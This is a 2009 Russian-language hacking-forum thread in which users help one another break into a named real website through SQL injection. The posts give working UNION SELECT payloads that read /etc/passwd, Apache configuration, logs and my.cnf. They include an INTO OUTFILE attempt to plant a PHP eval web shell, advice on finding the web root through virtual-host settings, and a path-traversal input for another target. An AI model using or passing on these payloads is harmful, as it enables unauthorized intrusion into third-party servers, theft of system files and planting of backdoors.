Не получается залить/найти абсолютный путь |
13.11.2009, 18:55
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
Провел на форуме:
115825
Репутация:
0
|
|
Не получается залить/найти абсолютный путь
Привет
вот вроде как уязвимость
http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd') from+mysql.user--+
проверка на заливку
http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,'<?php eval($_GET[‘e’]) ?>' from+mysql.user INTO OUTFILE '/tmp/aaaaaaaaa11231.php'--+
-все записывается в папку /tmp/ , так же если захожу в /etc/passwd отображается список админов + вроде абсолютные пути к сайтам ..,но !или нет прав записи или же абсолютный путь не правильный - это если заливать по пути который указан для админа по /home/virtual/site3/fst/home/spacefoundation в /etc/passwd 
И еще когда читаю файл из tmp то запись там вида -
1,2,3,4,5,6,7,8,9,10+<?php eval($_GET[‘e’]) ?> находится в сорсе ,...+ проверял на ошибки чтоб выдавал путь - без толку. в кеше гугла ошибок нет..
проверял на наличие стандартных папок по этим шаблонам - http://forum.antichat.ru/threadnav30632-1-10.html -тоже ничего не обнаружил ...очень конечно привлекло внимание расписанный /etc/passwd .. Есть мысли ?
Последний раз редактировалось apekoff; 13.11.2009 в 19:06..
|
|
|
13.11.2009, 19:19
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.
OS: RedHat:
Код:
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+
DocumentRoot "/var/www/html
Последний раз редактировалось Ins3t; 13.11.2009 в 19:24..
|
|
|
|
13.11.2009, 19:28
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
Провел на форуме:
115825
Репутация:
0
|
|
нашел ... а в какой строчке искать сие чудо ? ну или хотя бы куда смотреть ... или выложить целиком этот файл сюда ?ага извеняюсь , не заметил что поправил сообщение ..
Последний раз редактировалось apekoff; 13.11.2009 в 19:35..
|
|
|
|
13.11.2009, 19:40
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
Провел на форуме:
115825
Репутация:
0
|
|
[QUOTE=Ins3t]2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.
OS: RedHat:
Код:
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+
DocumentRoot "/var/www/html
не заливается ни в DocumentRoot "/var/www/htmlни в "/var/www/html/home/virtual/site3/fst/home/spacefoundation/111.php |
|
|
|
13.11.2009, 20:05
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
[QUOTE=apekoff]
Сообщение от Ins3t
2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.
OS: RedHat:
Код:
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+
DocumentRoot "/var/www/html
не заливается ни в DocumentRoot "/var/www/htmlни в "/var/www/html/home/virtual/site3/fst/home/spacefoundation/111.phpизучай:
Код:
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/var/log/httpd/access_log')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/var/log/httpd/error_log')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/my.cnf')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/logrotate.d/proftpd')--+
Последний раз редактировалось Pashkela; 13.11.2009 в 20:09..
|
|
|
|
13.11.2009, 19:23
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
Сообщение от icekvot
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
?lang=../../../../Documents+and+Settings/
|
|
|
|
13.11.2009, 19:36
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
apekoff, смотори Document_Root, настрйки вирутальных хостов в vhosts.conf, либо в папке vhost.d, либо в extra
Вообще в конце httpd.conf должны либо быть прописаны виртуальные хосты, либо инклудится файл с ними
|
|
|
|
13.11.2009, 19:39
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Сообщение от Spyder
apekoff, смотори Document_Root, настрйки вирутальных хостов в vhosts.conf, либо в папке vhost.d, либо в extra
Вообще в конце httpd.conf должны либо быть прописаны виртуальные хосты, либо инклудится файл с ними
DocumentRoot, без нижней черты.
# DocumentRoot "/var/www/html"
# DocumentRoot /www/docs/dummy-host.example.com
Это из httpd.conf
|
|
|
|
13.11.2009, 19:41
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
в DocumentRoot обычно путь до дефолных файлов апача, где index.html c текстом It's work
Как правило реальные пути до сайтов, особенно если это хостинг, находятся в вирутальных хостах
|
|
|
|
13.11.2009, 19:44
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
Провел на форуме:
115825
Репутация:
0
|
|
что т я запутался ребята куда смотреть что писать  |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
